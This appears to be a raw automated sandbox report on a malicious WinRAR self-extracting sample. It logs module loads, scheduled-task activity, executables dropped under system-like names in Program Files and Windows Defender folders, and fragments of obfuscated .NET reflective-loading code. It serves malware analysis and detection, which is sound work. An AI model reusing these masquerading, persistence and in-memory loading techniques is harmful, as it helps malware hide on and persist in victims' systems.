            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: version.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: wldp.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: profapi.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: amsi.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: userenv.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: propsys.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: edputil.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: netutils.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: slc.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: sppc.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeSection loaded: mscoree.dll
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeSection loaded: version.dll
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeSection loaded: uxtheme.dll
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeSection loaded: windows.storage.dll
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeSection loaded: wldp.dll
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeSection loaded: profapi.dll
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeSection loaded: cryptsp.dll
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeSection loaded: rsaenh.dll
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeSection loaded: cryptbase.dll
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeSection loaded: mscoree.dll
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeSection loaded: apphelp.dll
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeSection loaded: version.dll
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeSection loaded: uxtheme.dll
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeSection loaded: windows.storage.dll
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeSection loaded: wldp.dll
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeSection loaded: profapi.dll
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeSection loaded: cryptsp.dll
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeSection loaded: rsaenh.dll
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeSection loaded: cryptbase.dll
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeSection loaded: sspicli.dll
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeSection loaded: mscoree.dll
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeSection loaded: version.dll
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeSection loaded: uxtheme.dll
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeSection loaded: windows.storage.dll
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeSection loaded: wldp.dll
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeSection loaded: profapi.dll
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeSection loaded: cryptsp.dll
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeSection loaded: rsaenh.dll
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeSection loaded: cryptbase.dll
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeDirectory created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeDirectory created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\5b884080fd4f94Jump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeDirectory created: C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exeJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeDirectory created: C:\Program Files\Windows Defender\en-US\1824f7f43360d2Jump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeDirectory created: C:\Program Files\Windows NT\Accessories\en-GB\conhost.exeJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeDirectory created: C:\Program Files\Windows NT\Accessories\en-GB\088424020bedd6Jump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeDirectory created: C:\Program Files\7-Zip\Lang\TextInputHost.exeJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeDirectory created: C:\Program Files\7-Zip\Lang\22eafd247d37c3Jump to behavior
            Source: c62q1qZ8kX.exeStatic file information: File size 1164947 > 1048576
            Source: c62q1qZ8kX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: c62q1qZ8kX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: c62q1qZ8kX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: c62q1qZ8kX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: c62q1qZ8kX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: c62q1qZ8kX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: c62q1qZ8kX.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: c62q1qZ8kX.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: c62q1qZ8kX.exe
            Source: c62q1qZ8kX.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: c62q1qZ8kX.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: c62q1qZ8kX.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: c62q1qZ8kX.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: c62q1qZ8kX.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            barindex
            Source: 0.3.c62q1qZ8kX.exe.4b0f542.0.raw.unpack, L2YDcmKRhuRvjZdhj5X.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, L2YDcmKRhuRvjZdhj5X.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.3.c62q1qZ8kX.exe.4b0f542.0.raw.unpack, Ah49hCZH3dw5D4YGQl4.cs.Net Code: d5IWvFCcLT System.AppDomain.Load(byte[])
            Source: 0.3.c62q1qZ8kX.exe.4b0f542.0.raw.unpack, Ah49hCZH3dw5D4YGQl4.cs.Net Code: d5IWvFCcLT System.Reflection.Assembly.Load(byte[])
            Source: 0.3.c62q1qZ8kX.exe.4b0f542.0.raw.unpack, Ah49hCZH3dw5D4YGQl4.cs.Net Code: d5IWvFCcLT
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, Ah49hCZH3dw5D4YGQl4.cs.Net Code: d5IWvFCcLT System.AppDomain.Load(byte[])
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, Ah49hCZH3dw5D4YGQl4.cs.Net Code: d5IWvFCcLT System.Reflection.Assembly.Load(byte[])
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, Ah49hCZH3dw5D4YGQl4.cs.Net Code: d5IWvFCcLT
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeFile created: C:\blockrefSessionBrokerDll\__tmp_rar_sfx_access_check_7165656Jump to behavior
            Source: c62q1qZ8kX.exeStatic PE information: section name: .didat
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001EE28C push eax; ret 0_2_001EE2AA
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001EED46 push ecx; ret 0_2_001EED59
            Source: 0.3.c62q1qZ8kX.exe.4b0f542.0.raw.unpack, BTavBvZDvmurUhMi5F7.csHigh entropy of concatenated method names: '_0023Nn', 'Dispose', 'wp6BfUqTI6', 'zo3B9YiqJL', 'KlPBQKbYTG', 'E34Bt7j1WE', 'GrmBdKs7OU', 'FRT7mNHtHwihyhnEsUe', 'sbaAbAHF8owbFL0DEb2', 'o6Cmc4HYbdchUv191Bu'
            Source: 0.3.c62q1qZ8kX.exe.4b0f542.0.raw.unpack, csrKF2khS3vcSG1HyBI.csHigh entropy of concatenated method names: 'IHawXFlbBh', 'uxnwfFIBLy', 'zyAw9yiJpl', 'rIOwQIWhQ2', 'poPwtZjRpL', 'rGqcpyKO3uUN6Au4TNT', 'aHWa6BKHu8DkX7K2G1a', 'YKqNUPKo7KabMXVGYna', 'GxNA5aKkTi6gjnRyj9O', 'JgS9uhKp7S4iIeXebeg'
